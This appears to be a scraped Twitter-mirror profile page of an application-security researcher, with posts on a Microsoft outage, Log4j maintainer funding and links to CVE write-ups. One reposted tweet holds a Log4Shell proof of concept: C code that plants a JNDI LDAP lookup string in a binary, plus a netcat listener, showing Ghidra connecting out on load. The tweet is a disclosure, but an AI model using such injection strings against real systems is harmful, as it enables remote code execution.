Olivia
Online
Siva Siva
@zebasquared
App Sec @doordash former @okta @thezdi @TrendMicroRSRCH
Toronto
Joined February 2014
418 Following
450 Followers
864 Posts
uhmm what's going on at @Microsoft, their login experience has been broken for over 24 hours now. The comms team seems to have declared victory and moved on? Am I overreacting, or is this unusually long? I don’t recall problems like this dragging on in the past.
We’ve confirmed service health has returned to normal and reporting users that have completed the additional steps are able to access Outlook and Hotmail. For the list of mitigation steps and more information, please review the attached screenshot or visit
https://t.co/pYdahqxDv3 > Microsoft consumer products > https://t.co/GURUiPKrYH.
@MSFT365Status please check again, you're still down
Who to follow
starlabs
@starlabs_sg
A Singapore company that discovers vulnerabilities to help customers mitigate the risks of cyber attacks. Organisers of @offbyoneconf
Piotr Bazydło
@chudyPB
Principal Vulnerability Researcher at watchTowr | Previously: Zero Day Initiative | @[email protected]
ϻг_ϻε
@steventseeley
Artist disguised as a logician. Pwn2Own Winner. Spiritual Alchemy. An adept in the making.
Who knew if an attacker can modify your app configs that it could lead to bad things? ¯\_(ツ)_/¯
If developers dont know that untrustred data should not be passed to a JNDI lookup op then WE (the security community) have failed them. Its not THEIR fault
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage.
"I work on Log4j in my spare time"
"always dreamed of working on open source full time"
"3 sponsors are funding @rgoers's work: Michael, Glenn, Matt"
People, what are we doing.
Ghidra's vulnerable to log4j:
__attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}")))
int a = 1;
int main(){}
$ gcc hello.c
$ nc -l 1234
Load into Ghidra; it connects to 127.0.0.1:1234.
Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1
https://t.co/Qu1psCjtY6
@pyn3rd Woah I didn’t realize that this finding was from your team. Great finding!
#OBTS was just surreal. many thanks to everyone for the warm reception, you can find my slides detailing the story behind 5 app/macro sandbox escapes stemming from one root cause here: https://t.co/DXktTvGrp0
honoured to speak alongside so many brilliant folks at #OBTS v4 https://t.co/l1yWl14UmL see y'all in Maui!! 🏖️🌴
Are you an IDA Pro or Ghidra wizard 🧙♂️ Put your reverse engineering & binary exploitation skills to the test on new @okta binaries during our #oktabash2021 ⭐
Apply below ⬇️
https://t.co/KhBYCdGL3H
#bugbounty #bugbountytips
@thracky Oh damn! RIP 😅
@thracky 🤦 are you allowed to disclose the product?
Qualys Research Team discovered 21 severe vulnerabilities in Exim, the mail transfer agent (MTA) responsible for 60% of internet mail traffic. #21Nails could allow a remote attacker to gain full root privileges on the target server & execute commands. https://t.co/OhaT7stBPQ
I just published Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021–28482) https://t.co/oV0Q8ICsYg
wrote a little write-up about my first MS bug: CVE-2021-26413 https://t.co/TiI6CS5can big h/t to @mattifestation for sharing his endless knowledge!
[New Blog] Exploiting Windows RPC to bypass CFG mitigation: analysis of CVE-2021-26411 in-the-wild sample
https://t.co/mmM0B9BzN3
![iamelli0t's tweet photo. [New Blog] Exploiting Windows RPC to bypass CFG mitigation: analysis of CVE-2021-26411 in-the-wild sample
https://t.co/mmM0B9BzN3 https://t.co/kxR7HWkueb](https://pbs.twimg.com/media/Eymn23PVIAIoiZh.jpg)
Looking for an unauthenticated RCE in #BIND? How about one that's been around for 15 years? An anonymous researcher submitted just that to ZDI, and @_wmliang_ has a full analysis of this now patched bug. Read the details then patch. https://t.co/gJxFAQL0gO
Last Seen Users on Sotwe
First Class Football Tips
Seen from Indonesia
Koyu mavi
Seen from Turkey
kalpna 🎀
Seen from Netherlands
Peeing_jeans
Seen from Germany
y.⁷⁼¹ is seeing BTS
Seen from Turkey
حمودي العراقي
Boobies Public Flashing 🍒
Seen from Turkey
Orlando Marrero
Seen from Netherlands
Ember Snow
Seen from United Kingdom
Hijab NSFW
Seen from Malaysia
Most Popular Users
Elon Musk 
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.4M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.2M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.6M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.7M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
Neymar Jr
@neymarjr
62.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.7M followers